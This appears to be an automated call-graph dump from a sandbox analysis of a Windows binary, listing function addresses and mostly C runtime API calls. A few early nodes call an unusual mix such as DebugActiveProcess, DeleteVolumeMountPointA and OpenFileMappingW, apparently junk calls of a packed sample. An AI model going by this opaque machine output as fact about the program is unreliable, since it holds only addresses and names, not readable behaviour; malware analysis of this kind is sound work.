6691 402a49 6689->6691 6690->6689 6704 402834 6691->6704 6693 402a4e 6694 402a73 SetConsoleDisplayMode LockResource 6693->6694 6695 402a93 6693->6695 6694->6693 6696 402aa5 GetComputerNameW SetThreadExecutionState TlsSetValue 6695->6696 6697 402ac8 LoadLibraryW 6695->6697 6696->6695 6698 402ad8 6697->6698 6698->6132 6709 4060fe 6699->6709 6703 402971 6702->6703 6703->6689 6705 40289f 6704->6705 6706 402852 6704->6706 6705->6693 6706->6705 6707 402864 GetProcessWorkingSetSize WriteConsoleW LCMapStringA DebugActiveProcess 6706->6707 7015 4026cf 6706->7015 6707->6706 6710 406117 6709->6710 6713 405ecf 6710->6713 6725 404698 6713->6725 6715 405ef6 6717 404382 __lseeki64_nolock 68 API calls 6715->6717 6718 405efb 6717->6718 6719 404856 __commit 6 API calls 6718->6719 6722 403b1b 6719->6722 6721 405f33 6723 405f78 6721->6723 6733 40a7e0 6721->6733 6722->6686 6723->6722 6724 404382 __lseeki64_nolock 68 API calls 6723->6724 6724->6722 6726 4046ab 6725->6726 6732 4046f8 6725->6732 6740 4063f0 6726->6740 6729 4046d8 6729->6732 6760 408724 6729->6760 6732->6715 6732->6721 6734 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 6733->6734 6735 40a7f4 6734->6735 6739 40a801 6735->6739 6948 4090cc 6735->6948 6739->6721 6741 406377 __getptd_noexit 68 API calls 6740->6741 6742 4063f8 6741->6742 6743 4046b0 6742->6743 6744 403b50 __amsg_exit 68 API calls 6742->6744 6743->6729 6745 408e90 6743->6745 6744->6743 6746 408e9c __commit 6745->6746 6747 4063f0 __getptd 68 API calls 6746->6747 6748 408ea1 6747->6748 6749 408ecf 6748->6749 6751 408eb3 6748->6751 6750 406842 __lock 68 API calls 6749->6750 6752 408ed6 6750->6752 6753 4063f0 __getptd 68 API calls 6751->6753 6776 408e52 6752->6776 6755 408eb8 6753->6755 6758 408ec6 __commit 6755->6758 6759 403b50 __amsg_exit 68 API calls 6755->6759 6758->6729 6759->6758 6761 408730 __commit 6760->6761 6762 4063f0 __getptd 68 API calls 6761->6762 6763 408735 6762->6763 6764 408747 6763->6764 6765 406842 __lock 68 API calls 6763->6765 6767 408755 __commit 6764->6767 6769 403b50 __amsg_exit 68 API calls 6764->6769 6766 408765 6765->6766 6768 4087ae 6766->6768 6771 408796 InterlockedIncrement 6766->6771 6772 40877c InterlockedDecrement 6766->6772 6767->6732 6944 4087bf 6768->6944 6769->6767 6771->6768 6772->6771 6773 408787 6772->6773 6773->6771 6774 4081a8 __wsetenvp 68 API calls 6773->6774 6775 408795 6774->6775 6775->6771 6777 408e56 6776->6777 6783 408e88 6776->6783 6778 408d2a ___addlocaleref 8 API calls 6777->6778 6777->6783 6779 408e69 6778->6779 6779->6783 6787 408db9 6779->6787 6784 408efa 6783->6784 6943 406768 LeaveCriticalSection 6784->6943 6786 408f01 6786->6755 6788 408dca InterlockedDecrement 6787->6788 6789 408e4d 6787->6789 6790 408de2 6788->6790 6791 408ddf InterlockedDecrement 6788->6791 6789->6783 6801 408be1 6789->6801 6792 408dec InterlockedDecrement 6790->6792 6793 408def 6790->6793 6791->6790 6792->6793 6794 408df9 InterlockedDecrement 6793->6794 6795 408dfc 6793->6795 6794->6795 6796 408e06 InterlockedDecrement 6795->6796 6798 408e09 6795->6798 6796->6798 6797 408e22 InterlockedDecrement 6797->6798 6798->6797 6799 408e3d InterlockedDecrement 6798->6799 6800 408e32 InterlockedDecrement 6798->6800 6799->6789 6800->6798 6802 408c65 6801->6802 6810 408bf8 6801->6810 6803 4081a8 __wsetenvp 68 API calls 6802->6803 6804 408cb2 6802->6804 6805 408c86 6803->6805 6823 408cd9 6804->6823 6855 40c732 6804->6855 6807 4081a8 __wsetenvp 68 API calls 6805->6807 6812 408c99 6807->6812 6808 408c2c 6809 408c4d 6808->6809 6819 4081a8 __wsetenvp 68 API calls 6808->6819 6813 4081a8 __wsetenvp 68 API calls 6809->6813 6810->6802 6810->6808 6815 4081a8 __wsetenvp 68 API calls 6810->6815 6817 4081a8 __wsetenvp 68 API calls 6812->6817 6820 408c5a 6813->6820 6814 408d1e 6821 4081a8 __wsetenvp 68 API calls 6814->6821 6822 408c21 6815->6822 6816 4081a8 __wsetenvp 68 API calls 6816->6823 6826 408ca7 6817->6826 6818 4081a8 68 API calls __wsetenvp 6818->6823 6827 408c42 6819->6827 6828 4081a8 __wsetenvp 68 API calls 6820->6828 6824 408d24 6821->6824 6831 40c90c 6822->6831 6823->6814 6823->6818 6824->6783 6829 4081a8 __wsetenvp 68 API calls 6826->6829 6847 40c8c7 6827->6847 6828->6802 6829->6804 6832 40c919 6831->6832 6846 40c996 6831->6846 6833 40c92a 6832->6833 6835 4081a8 __wsetenvp 68 API calls 6832->6835 6834 40c93c 6833->6834 6836 4081a8 __wsetenvp 68 API calls 6833->6836 6837 40c94e 6834->6837 6838 4081a8 __wsetenvp 68 API calls 6834->6838 6835->6833 6836->6834 6839 4081a8 __wsetenvp 68 API calls 6837->6839 6840 40c960 6837->6840 6838->6837 6839->6840 6842 40c972 6840->6842 6843 4081a8 __wsetenvp 68 API calls 6840->6843 6841 40c984 6845 4081a8 __wsetenvp 68 API calls 6841->6845 6841->6846 6842->6841 6844 4081a8 __wsetenvp 68 API calls 6842->6844 6843->6842 6844->6841 6845->6846 6846->6808 6848 40c8d4 6847->6848 6854 40c908 6847->6854 6849 40c8e4 6848->6849 6850 4081a8 __wsetenvp 68 API calls 6848->6850 6851 4081a8 __wsetenvp 68 API calls 6849->6851 6852 40c8f6 6849->6852 6850->6849 6851->6852 6853 4081a8 __wsetenvp 68 API calls 6852->6853 6852->6854 6853->6854 6854->6809 6856 40c743 6855->6856 6942 408cd2 6855->6942 6857 4081a8 __wsetenvp 68 API calls 6856->6857 6858 40c74b 6857->6858 6859 4081a8 __wsetenvp 68 API calls 6858->6859 6860 40c753 6859->6860 6861 4081a8 __wsetenvp 68 API calls 6860->6861 6862 40c75b 6861->6862 6863 4081a8 __wsetenvp 68 API calls 6862->6863 6864 40c763 6863->6864 6865 4081a8 __wsetenvp 68 API calls 6864->6865 6866 40c76b 6865->6866 6867 4081a8 __wsetenvp 68 API calls 6866->6867 6868 40c773 6867->6868 6869 4081a8 __wsetenvp 68 API calls 6868->6869 6870 40c77a 6869->6870 6871 4081a8 __wsetenvp 68 API calls 6870->6871 6872 40c782 6871->6872 6873 4081a8 __wsetenvp 68 API calls 6872->6873 6874 40c78a 6873->6874 6875 4081a8 __wsetenvp 68 API calls 6874->6875 6876 40c792 6875->6876 6877 4081a8 __wsetenvp 68 API calls 6876->6877 6878 40c79a 6877->6878 6879 4081a8 __wsetenvp 68 API calls 6878->6879 6880 40c7a2 6879->6880 6881 4081a8 __wsetenvp 68 API calls 6880->6881 6882 40c7aa 6881->6882 6883 4081a8 __wsetenvp 68 API calls 6882->6883 6884 40c7b2 6883->6884 6885 4081a8 __wsetenvp 68 API calls 6884->6885 6886 40c7ba 6885->6886 6887 4081a8 __wsetenvp 68 API calls 6886->6887 6888 40c7c2 6887->6888 6889 4081a8 __wsetenvp 68 API calls 6888->6889 6890 40c7cd 6889->6890 6891 4081a8 __wsetenvp 68 API calls 6890->6891 6892 40c7d5 6891->6892 6893 4081a8 __wsetenvp 68 API calls 6892->6893 6894 40c7dd 6893->6894 6895 4081a8 __wsetenvp 68 API calls 6894->6895 6896 40c7e5 6895->6896 6897 4081a8 __wsetenvp 68 API calls 6896->6897 6898 40c7ed 6897->6898 6899 4081a8 __wsetenvp 68 API calls 6898->6899 6900 40c7f5 6899->6900 6901 4081a8 __wsetenvp 68 API calls 6900->6901 6902 40c7fd 6901->6902 6903 4081a8 __wsetenvp 68 API calls 6902->6903 6904 40c805 6903->6904 6905 4081a8 __wsetenvp 68 API calls 6904->6905 6906 40c80d 6905->6906 6907 4081a8 __wsetenvp 68 API calls 6906->6907 6908 40c815 6907->6908 6909 4081a8 __wsetenvp 68 API calls 6908->6909 6910 40c81d 6909->6910 6911 4081a8 __wsetenvp 68 API calls 6910->6911 6912 40c825 6911->6912 6913 4081a8 __wsetenvp 68 API calls 6912->6913 6914 40c82d 6913->6914 6915 4081a8 __wsetenvp 68 API calls 6914->6915 6916 40c835 6915->6916 6917 4081a8 __wsetenvp 68 API calls 6916->6917 6918 40c83d 6917->6918 6919 4081a8 __wsetenvp 68 API calls 6918->6919 6920 40c845 6919->6920 6921 4081a8 __wsetenvp 68 API calls 6920->6921 6922 40c853 6921->6922 6923 4081a8 __wsetenvp 68 API calls 6922->6923 6924 40c85e 6923->6924 6925 4081a8 __wsetenvp 68 API calls 6924->6925 6926 40c869 6925->6926 6927 4081a8 __wsetenvp 68 API calls 6926->6927 6928 40c874 6927->6928 6929 4081a8 __wsetenvp 68 API calls 6928->6929 6930 40c87f 6929->6930 6931 4081a8 __wsetenvp 68 API calls 6930->6931 6932 40c88a 6931->6932 6933 4081a8 __wsetenvp 68 API calls 6932->6933 6934 40c895 6933->6934 6935 4081a8 __wsetenvp 68 API calls 6934->6935 6936 40c8a0 6935->6936 6937 4081a8 __wsetenvp 68 API calls 6936->6937 6938 40c8ab 6937->6938 6939 4081a8 __wsetenvp 68 API calls 6938->6939 6940 40c8b6 6939->6940 6941 4081a8 __wsetenvp 68 API calls 6940->6941 6941->6942 6942->6816 6943->6786 6947 406768 LeaveCriticalSection 6944->6947 6946 4087c6 6946->6764 6947->6946 6949 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 6948->6949 6950 4090df 6949->6950 6951 40c6f0 6950->6951 6952 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 6951->6952 6953 40c703 6952->6953 6956 40c536 6953->6956 6957 40c557 GetStringTypeW 6956->6957 6961 40c582 6956->6961 6958 40c577 GetLastError 6957->6958 6959 40c56f 6957->6959 6958->6961 6962 40c5bb MultiByteToWideChar 6959->6962 6978 40c663 6959->6978 6960 40c669 6984 40d99f GetLocaleInfoA 6960->6984 6961->6959 6961->6960 6968 40c5e8 6962->6968 6962->6978 6964 405ec0 ___mtold12 5 API calls 6966 40c6ee 6964->6966 6966->6739 6967 40c6ba GetStringTypeA 6973 40c6d5 6967->6973 6967->6978 6969 40c5fd _memset __alloca_probe_16 6968->6969 6970 40b484 _malloc 68 API calls 6968->6970 6972 40c636 MultiByteToWideChar 6969->6972 6969->6978 6970->6969 6976 40c64c GetStringTypeW 6972->6976 6977 40c65d 6972->6977 6974 4081a8 __wsetenvp 68 API calls 6973->6974 6974->6978 6976->6977 6980 40a9ff 6977->6980 6978->6964 6981 40aa0b 6980->6981 6982 40aa1c 6980->6982 6981->6982 6983 4081a8 __wsetenvp 68 API calls 6981->6983 6982->6978 6983->6982 6985 40d9d2 6984->6985 6986 40d9cd 6984->6986 6987 403b0a ___ansicp 91 API calls 6985->6987 6988 405ec0 ___mtold12 5 API calls 6986->6988 6987->6986 6989 40c68d 6988->6989 6989->6967 6989->6978 6990 40d9e8 6989->6990 6991 40da28 GetCPInfo 6990->6991 6995 40dab2 6990->6995 6992 40da9d MultiByteToWideChar 6991->6992 6993 40da3f 6991->6993 6992->6995 6999 40da58 _strlen 6992->6999 6993->6992 6996 40da45 GetCPInfo 6993->6996 6994 405ec0 ___mtold12 5 API calls 6997 40c6ae 6994->6997 6995->6994 6996->6992 6998 40da52 6996->6998 6997->6967 6997->6978 6998->6992 6998->6999 7000 40b484 _malloc 68 API calls 6999->7000 7002 40da8a _memset __alloca_probe_16 6999->7002 7000->7002 7001 40dae7 MultiByteToWideChar 7003 40db1e 7001->7003 7004 40daff 7001->7004 7002->6995 7002->7001 7005 40a9ff __freea 68 API calls 7003->7005 7006 40db23 7004->7006 7007 40db06 WideCharToMultiByte 7004->7007 7005->6995 7008 40db42 7006->7008 7009 40db2e WideCharToMultiByte 7006->7009 7007->7003 7010 40810e __calloc_crt 68 API calls 7008->7010 7009->7003 7009->7008 7011 40db4a 7010->7011 7011->7003 7012 40db53 WideCharToMultiByte 7011->7012 7012->7003 7013 40db65 7012->7013 7014 4081a8 __wsetenvp 68 API calls 7013->7014 7014->7003 7016 4026fc 7015->7016 7017 40274e InterlockedExchange 7016->7017 7018 40279b GetTickCount 7016->7018 7019 4027b3 OpenFileMappingW DeleteVolumeMountPointA 7016->7019 7020 402828 7016->7020 7017->7016 7018->7016 7019->7016 7020->6706 7022 40619b _doexit 7 API calls 7021->7022 7023 403e12 __init_pointers __initp_misc_winsig 7022->7023 7043 406ba6 7023->7043 7026 406129 __encode_pointer 7 API calls 7027 403e4e 7026->7027 7027->6155 7029 4066d1 7028->7029 7030 406653 7029->7030 7031 406d45 ___lock_fhandle InitializeCriticalSectionAndSpinCount 7029->7031 7030->6145 7030->6165 7031->7029 7033 406269 7032->7033 7034 40625d 7032->7034 7035 40627d TlsFree 7033->7035 7037 40628b 7033->7037 7036 4061a4 __decode_pointer 6 API calls 7034->7036 7035->7037 7036->7033 7038 40672d DeleteCriticalSection 7037->7038 7040 406745 7037->7040 7039 4081a8 __wsetenvp 68 API calls 7038->7039 7039->7037 7041 406765 7040->7041 7042 406757 DeleteCriticalSection 7040->7042 7041->6150 7042->7040 7044 406129 __encode_pointer 7 API calls 7043->7044 7045 403e44 7044->7045 7045->7026 7047 403ca0 __commit 7046->7047 7048 406842 __lock 68 API calls 7047->7048 7049 403ca7 7048->7049 7051 4061a4 __decode_pointer 6 API calls 7049->7051 7056 403d60 __initterm 7049->7056 7054 403cde 7051->7054 7053 403da8 __commit 7053->6187 7054->7056 7058 4061a4 __decode_pointer 6 API calls 7054->7058 7063 403dab 7056->7063 7057 403d9f 7059 403ba4 _malloc 3 API calls 7057->7059 7062 403cf3 7058->7062 7059->7053 7060 40619b 7 API calls _doexit 7060->7062 7061 4061a4 6 API calls __decode_pointer 7061->7062 7062->7056 7062->7060 7062->7061 7064 403db1 7063->7064 7065 403d8c 7063->7065 7068 406768 LeaveCriticalSection 7064->7068 7065->7053 7067 406768 LeaveCriticalSection 7065->7067 7067->7057 7068->7065 7072 408844 7082 4087c8 7072->7082 7075 40886f setSBCS 7076 405ec0 ___mtold12 5 API calls 7075->7076 7078 408a27 7076->7078 7077 4088b3 IsValidCodePage 7077->7075 7079 4088c5 GetCPInfo 7077->7079 7079->7075 7081 4088d8 _memset __setmbcp_nolock 7079->7081 7089 408591 GetCPInfo 7081->7089 7083 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7082->7083 7084 4087dc 7083->7084 7085 408805 7084->7085 7086 4087e7 GetOEMCP 7084->7086 7087 40880a GetACP 7085->7087 7088 4087f7 7085->7088 7086->7088 7087->7088 7088->7075 7088->7077 7088->7081 7090 408677 7089->7090 7093 4085c5 _memset 7089->7093 7095 405ec0 ___mtold12 5 API calls 7090->7095 7091 40c6f0 ___crtGetStringTypeA 92 API calls 7092 408632 7091->7092 7099 40c4f1 7092->7099 7093->7091 7097 408722 7095->7097 7097->7081 7098 40c4f1 ___crtLCMapStringA 103 API calls 7098->7090 7100 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7099->7100 7101 40c504 7100->7101 7104 40c14c 7101->7104 7105 40c16d LCMapStringW 7104->7105 7108 40c188 7104->7108 7106 40c190 GetLastError 7105->7106 7105->7108 7106->7108 7107 40c386 7110 40d99f ___ansicp 92 API calls 7107->7110 7108->7107 7109 40c1e2 7108->7109 7111 40c1fb MultiByteToWideChar 7109->7111 7133 40c37d 7109->7133 7113 40c3ae 7110->7113 7118 40c228 7111->7118 7111->7133 7112 405ec0 ___mtold12 5 API calls 7114 408652 7112->7114 7115 40c4a2 LCMapStringA 7113->7115 7116 40c3c7 7113->7116 7113->7133 7114->7098 7150 40c3fe 7115->7150 7119 40d9e8 ___convertcp 75 API calls 7116->7119 7117 40c279 MultiByteToWideChar 7120 40c292 LCMapStringW 7117->7120 7121 40c374 7117->7121 7123 40b484 _malloc 68 API calls 7118->7123 7130 40c241 __alloca_probe_16 7118->7130 7124 40c3d9 7119->7124 7120->7121 7125 40c2b3 7120->7125 7128 40a9ff __freea 68 API calls 7121->7128 7122 40c4c9 7131 4081a8 __wsetenvp 68 API calls 7122->7131 7122->7133 7123->7130 7127 40c3e3 LCMapStringA 7124->7127 7124->7133 7129 40c2bc 7125->7129 7136 40c2e5 7125->7136 7126 4081a8 __wsetenvp 68 API calls 7126->7122 7134 40c405 7127->7134 7127->7150 7128->7133 7129->7121 7132 40c2ce LCMapStringW 7129->7132 7130->7117 7130->7133 7131->7133 7132->7121 7133->7112 7137 40c416 _memset __alloca_probe_16 7134->7137 7138 40b484 _malloc 68 API calls 7134->7138 7135 40c334 LCMapStringW 7139 40c34c WideCharToMultiByte 7135->7139 7140 40c36e 7135->7140 7141 40c300 __alloca_probe_16 7136->7141 7142 40b484 _malloc 68 API calls 7136->7142 7144 40c454 LCMapStringA 7137->7144 7137->7150 7138->7137 7139->7140 7143 40a9ff __freea 68 API calls 7140->7143 7141->7121 7141->7135 7142->7141 7143->7121 7146 40c474 7144->7146 7148 40c470 7144->7148 7147 40d9e8 ___convertcp 75 API calls 7146->7147 7147->7148 7149 40a9ff __freea 68 API calls 7148->7149 7149->7150 7150->7122 7150->7126 7198 40640a 7199 406416 __commit 7198->7199 7200 40642e 7199->7200 7201 406518 __commit 7199->7201 7202 4081a8 __wsetenvp 68 API calls 7199->7202 7203 4081a8 __wsetenvp 68 API calls 7200->7203 7204 40643c 7200->7204 7202->7200 7203->7204 7205 40644a 7204->7205 7206 4081a8 __wsetenvp 68 API calls 7204->7206 7207 406458 7205->7207 7208 4081a8 __wsetenvp 68 API calls 7205->7208 7206->7205 7209 406466 7207->7209 7210 4081a8 __wsetenvp 68 API calls 7207->7210 7208->7207 7211 406474 7209->7211 7212 4081a8 __wsetenvp 68 API calls 7209->7212 7210->7209 7213 406482 7211->7213 7214 4081a8 __wsetenvp 68 API calls 7211->7214 7212->7211 7215 406493 7213->7215 7216 4081a8 __wsetenvp 68 API calls 7213->7216 7214->7213 7217 406842 __lock 68 API calls 7215->7217 7216->7215 7218 40649b 7217->7218 7219 4064c0 7218->7219 7220 4064a7 InterlockedDecrement 7218->7220 7234 406524 7219->7234 7220->7219 7221 4064b2 7220->7221 7221->7219 7225 4081a8 __wsetenvp 68 API calls 7221->7225 7224 406842 __lock 68 API calls 7226 4064d4 7224->7226 7225->7219 7227 406505 7226->7227 7228 408db9 ___removelocaleref 8 API calls 7226->7228 7237 406530 7227->7237 7232 4064e9 7228->7232 7231 4081a8 __wsetenvp 68 API calls 7231->7201 7232->7227 7233 408be1 ___freetlocinfo 68 API calls 7232->7233 7233->7227 7240 406768 LeaveCriticalSection 7234->7240 7236 4064cd 7236->7224 7241 406768 LeaveCriticalSection 7237->7241 7239 406512 7239->7231 7240->7236 7241->7239 7543 408b8a 7546 406768 LeaveCriticalSection 7543->7546 7545 408b91 7546->7545 7280 409dcb 7283 409d43 7280->7283 7282 409de9 7284 409d50 7283->7284 7285 409daf 7283->7285 7284->7285 7287 409d55 7284->7287 7341 409634 7285->7341 7289 409d73 7287->7289 7290 409d5a 7287->7290 7288 409d94 7288->7282 7292 409d96 7289->7292 7294 409d7d 7289->7294 7297 409b8e 7290->7297 7328 409724 7292->7328 7311 409c49 7294->7311 7355 40d03a 7297->7355 7300 409bc8 7302 404382 __lseeki64_nolock 68 API calls 7300->7302 7301 409be7 7365 40cebe 7301->7365 7303 409bcd 7302->7303 7304 404856 __commit 6 API calls 7303->7304 7306 409bd9 7304->7306 7308 405ec0 ___mtold12 5 API calls 7306->7308 7310 409c47 7308->7310 7310->7282 7312 40d03a __fltout2 68 API calls 7311->7312 7314 409c7a 7312->7314 7313 409c83 7315 404382 __lseeki64_nolock 68 API calls 7313->7315 7314->7313 7316 409ca5 7314->7316 7317 409c88 7315->7317 7320 40cebe __fptostr 68 API calls 7316->7320 7318 404856 __commit 6 API calls 7317->7318 7319 409c94 7318->7319 7322 405ec0 ___mtold12 5 API calls 7319->7322 7321 409cd1 7320->7321 7321->7319 7324 409d18 7321->7324 7326 409cf0 7321->7326 7323 409d41 7322->7323 7323->7288 7409 4094c5 7324->7409 7327 409a97 __cftof2_l 78 API calls 7326->7327 7327->7319 7329 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7328->7329 7330 409749 7329->7330 7331 409758 7330->7331 7332 409788 7330->7332 7333 404382 __lseeki64_nolock 68 API calls 7331->7333 7334 409796 7332->7334 7338 40979f 7332->7338 7335 40975d 7333->7335 7336 404382 __lseeki64_nolock 68 API calls 7334->7336 7337 404856 __commit 6 API calls 7335->7337 7336->7335 7340 40976c _memset __alldvrm __cftoa_l _strrchr 7337->7340 7338->7340 7428 409704 7338->7428 7340->7288 7342 40d03a __fltout2 68 API calls 7341->7342 7343 409665 7342->7343 7344 40966e 7343->7344 7346 40968d 7343->7346 7345 404382 __lseeki64_nolock 68 API calls 7344->7345 7347 409673 7345->7347 7349 40cebe __fptostr 68 API calls 7346->7349 7348 404856 __commit 6 API calls 7347->7348 7351 40967f 7348->7351 7352 4096d1 7349->7352 7350 405ec0 ___mtold12 5 API calls 7353 409702 7350->7353 7351->7350 7352->7351 7354 4094c5 __cftoe2_l 78 API calls 7352->7354 7353->7288 7354->7351 7356 40d065 ___dtold 7355->7356 7391 40ed1c 7356->7391 7359 40a627 _strcpy_s 68 API calls 7360 40d0a0 7359->7360 7361 40472e __invoke_watson 10 API calls 7360->7361 7363 40d0b3 7360->7363 7361->7363 7362 405ec0 ___mtold12 5 API calls 7364 409bbf 7362->7364 7363->7362 7364->7300 7364->7301 7366 40cef3 7365->7366 7367 40ced5 7365->7367 7366->7367 7369 40cef8 7366->7369 7368 404382 __lseeki64_nolock 68 API calls 7367->7368 7370 40ceda 7368->7370 7372 40cf0d 7369->7372 7375 40cf1b _strlen 7369->7375 7371 404856 __commit 6 API calls 7370->7371 7374 409c1a 7371->7374 7373 404382 __lseeki64_nolock 68 API calls 7372->7373 7373->7370 7374->7306 7377 409a97 7374->7377 7375->7374 7376 40b0d0 __shift __VEC_memcpy 7375->7376 7376->7374 7378 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7377->7378 7379 409ab5 7378->7379 7380 409ab9 7379->7380 7384 409aec 7379->7384 7381 404382 __lseeki64_nolock 68 API calls 7380->7381 7382 409abe 7381->7382 7383 404856 __commit 6 API calls 7382->7383 7390 409acf _memset 7383->7390 7385 409b28 7384->7385 7405 409480 7384->7405 7387 409480 __shift __VEC_memcpy 7385->7387 7385->7390 7388 409b3d 7387->7388 7389 409480 __shift __VEC_memcpy 7388->7389 7388->7390 7389->7390 7390->7306 7395 40ed92 7391->7395 7392 40edff 7394 40a627 _strcpy_s 68 API calls 7392->7394 7393 405ec0 ___mtold12 5 API calls 7396 40d080 7393->7396 7397 40ee62 7394->7397 7395->7392 7398 40ee17 7395->7398 7404 40edaf 7395->7404 7396->7359 7399 40472e __invoke_watson 10 API calls 7397->7399 7397->7404 7400 40a627 _strcpy_s 68 API calls 7398->7400 7399->7404 7401 40ee36 7400->7401 7402 40472e __invoke_watson 10 API calls 7401->7402 7401->7404 7402->7404 7403 40f614 7404->7393 7404->7403 7406 409489 _strlen 7405->7406 7407 40949a 7405->7407 7408 40b0d0 __shift __VEC_memcpy 7406->7408 7407->7385 7408->7407 7410 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 7409->7410 7411 4094dd 7410->7411 7412 4094e3 7411->7412 7413 409513 7411->7413 7414 404382 __lseeki64_nolock 68 API calls 7412->7414 7417 409530 7413->7417 7418 409527 7413->7418 7415 4094e8 7414->7415 7416 404856 __commit 6 API calls 7415->7416 7425 4094f7 7416->7425 7420 409480 __shift __VEC_memcpy 7417->7420 7421 409554 7417->7421 7419 404382 __lseeki64_nolock 68 API calls 7418->7419 7419->7415 7420->7421 7422 40a627 _strcpy_s 68 API calls 7421->7422 7423 4095ab 7422->7423 7424 40472e __invoke_watson 10 API calls 7423->7424 7426 4095be 7423->7426 7424->7426 7425->7319 7426->7425 7427 40b0d0 __shift __VEC_memcpy 7426->7427 7427->7425 7429 409634 __cftoe_l 78 API calls 7428->7429 7430 40971f 7429->7430 7430->7340 7431 404acf 7432 404ad7 __cfltcvt_init 7431->7432 7437 409e57 GetModuleHandleA 7432->7437 7435 404aec 7438 409e66 GetProcAddress 7437->7438 7439 404adc 7437->7439 7438->7439 7439->7435 7440 409dee 7439->7440 7445 40d1cf 7440->7445 7442 409e03 7443 409e14 7442->7443 7444 40472e __invoke_watson 10 API calls 7442->7444 7443->7435 7444->7443 7446 40d1ea __control87 7445->7446 7448 40d213 __control87 7445->7448 7447 404382 __lseeki64_nolock 68 API calls 7446->7447 7449 40d204 7447->7449 7448->7442 7450 404856 __commit 6 API calls 7449->7450 7450->7448 7151 409250 7152 409262 7151->7152 7154 409270 @_EH4_CallFilterFunc@8 7151->7154 7153 405ec0 ___mtold12 5 API calls 7152->7153 7153->7154 7547 406b91 7548 406b94 7547->7548 7549 4039d2 _abort 70 API calls 7548->7549 7550 406ba0 __commit 7549->7550 7242 406216 TlsAlloc 7551 40459a 7558 40845f 7551->7558 7554 4045ad 7556 4081a8 __wsetenvp 68 API calls 7554->7556 7557 4045b8 7556->7557 7571 408385 7558->7571 7560 40459f 7560->7554 7561 408236 7560->7561 7562 408242 __commit 7561->7562 7563 406842 __lock 68 API calls 7562->7563 7569 40824e 7563->7569 7564 4082b7 7612 4082cc 7564->7612 7566 4082c3 __commit 7566->7554 7568 40828c DeleteCriticalSection 7570 4081a8 __wsetenvp 68 API calls 7568->7570 7569->7564 7569->7568 7599 40b7e0 7569->7599 7570->7569 7572 408391 __commit 7571->7572 7573 406842 __lock 68 API calls 7572->7573 7580 4083a0 7573->7580 7574 408438 7589 408456 7574->7589 7577 408444 __commit 7577->7560 7579 40833d 106 API calls __fflush_nolock 7579->7580 7580->7574 7580->7579 7581 4045fb 7580->7581 7586 408427 7580->7586 7582 404608 7581->7582 7583 40461e EnterCriticalSection 7581->7583 7584 406842 __lock 68 API calls 7582->7584 7583->7580 7585 404611 7584->7585 7585->7580 7592 404669 7586->7592 7588 408435 7588->7580 7598 406768 LeaveCriticalSection 7589->7598 7591 40845d 7591->7577 7593 404679 7592->7593 7594 40468c LeaveCriticalSection 7592->7594 7597 406768 LeaveCriticalSection 7593->7597 7594->7588 7596 404689 7596->7588 7597->7596 7598->7591 7600 40b7ec __commit 7599->7600 7601 40b800 7600->7601 7602 40b81d 7600->7602 7603 404382 __lseeki64_nolock 68 API calls 7601->7603 7610 40b815 __commit 7602->7610 7615 4045ba 7602->7615 7605 40b805 7603->7605 7607 404856 __commit 6 API calls 7605->7607 7607->7610 7610->7569 7859 406768 LeaveCriticalSection 7612->7859 7614 4082d3 7614->7566 7616 4045cc 7615->7616 7617 4045ee EnterCriticalSection 7615->7617 7616->7617 7618 4045d4 7616->7618 7619 4045e4 7617->7619 7620 406842 __lock 68 API calls 7618->7620 7621 40b769 7619->7621 7620->7619 7622 40b799 7621->7622 7623 40b77d 7621->7623 7629 40b792 7622->7629 7640 4082d5 7622->7640 7624 404382 __lseeki64_nolock 68 API calls 7623->7624 7625 40b782 7624->7625 7627 404856 __commit 6 API calls 7625->7627 7627->7629 7637 40b854 7629->7637 7635 40b7b9 7635->7629 7636 4081a8 __wsetenvp 68 API calls 7635->7636 7636->7629 7852 40462d 7637->7852 7639 40b85a 7639->7610 7641 408310 7640->7641 7642 4082ee 7640->7642 7646 40d62a 7641->7646 7642->7641 7643 4084cc __fileno 68 API calls 7642->7643 7644 408309 7643->7644 7679 40bf8f 7644->7679 7647 40b7ad 7646->7647 7648 40d63a 7646->7648 7650 4084cc 7647->7650 7648->7647 7649 4081a8 __wsetenvp 68 API calls 7648->7649 7649->7647 7651 4084f0 7650->7651 7652 4084db 7650->7652 7656 40d55d 7651->7656 7653 404382 __lseeki64_nolock 68 API calls 7652->7653 7654 4084e0 7653->7654 7655 404856 __commit 6 API calls 7654->7655 7655->7651 7657 40d569 __commit 7656->7657 7658 40d571 7657->7658 7659 40d58c 7657->7659 7660 404395 __commit 68 API calls 7658->7660 7661 40d59a 7659->7661 7665 40d5db 7659->7665 7663 40d576 7660->7663 7662 404395 __commit 68 API calls 7661->7662 7664 40d59f 7662->7664 7666 404382 __lseeki64_nolock 68 API calls 7663->7666 7667 404382 __lseeki64_nolock 68 API calls 7664->7667 7668 40d8d8 ___lock_fhandle 69 API calls 7665->7668 7669 40d57e __commit 7666->7669 7670 40d5a6 7667->7670 7671 40d5e1 7668->7671 7669->7635 7672 404856 __commit 6 API calls 7670->7672 7673 40d5fc 7671->7673 7674 40d5ee 7671->7674 7672->7669 7676 404382 __lseeki64_nolock 68 API calls 7673->7676 7824 40d4c1 7674->7824 7677 40d5f6 7676->7677 7839 40d620 7677->7839 7680 40bf9b __commit 7679->7680 7681 40bfa3 7680->7681 7682 40bfbe 7680->7682 7704 404395 7681->7704 7684 40bfcc 7682->7684 7687 40c00d 7682->7687 7686 404395 __commit 68 API calls 7684->7686 7689 40bfd1 7686->7689 7707 40d8d8 7687->7707 7688 404382 __lseeki64_nolock 68 API calls 7697 40bfb0 __commit 7688->7697 7691 404382 __lseeki64_nolock 68 API calls 7689->7691 7693 40bfd8 7691->7693 7692 40c013 7694 40c020 7692->7694 7695 40c036 7692->7695 7696 404856 __commit 6 API calls 7693->7696 7717 40b85c 7694->7717 7699 404382 __lseeki64_nolock 68 API calls 7695->7699 7696->7697 7697->7641 7701 40c03b 7699->7701 7700 40c02e 7776 40c061 7700->7776 7702 404395 __commit 68 API calls 7701->7702 7702->7700 7705 406377 __getptd_noexit 68 API calls 7704->7705 7706 40439a 7705->7706 7706->7688 7708 40d8e4 __commit 7707->7708 7709 40d93f 7708->7709 7710 406842 __lock 68 API calls 7708->7710 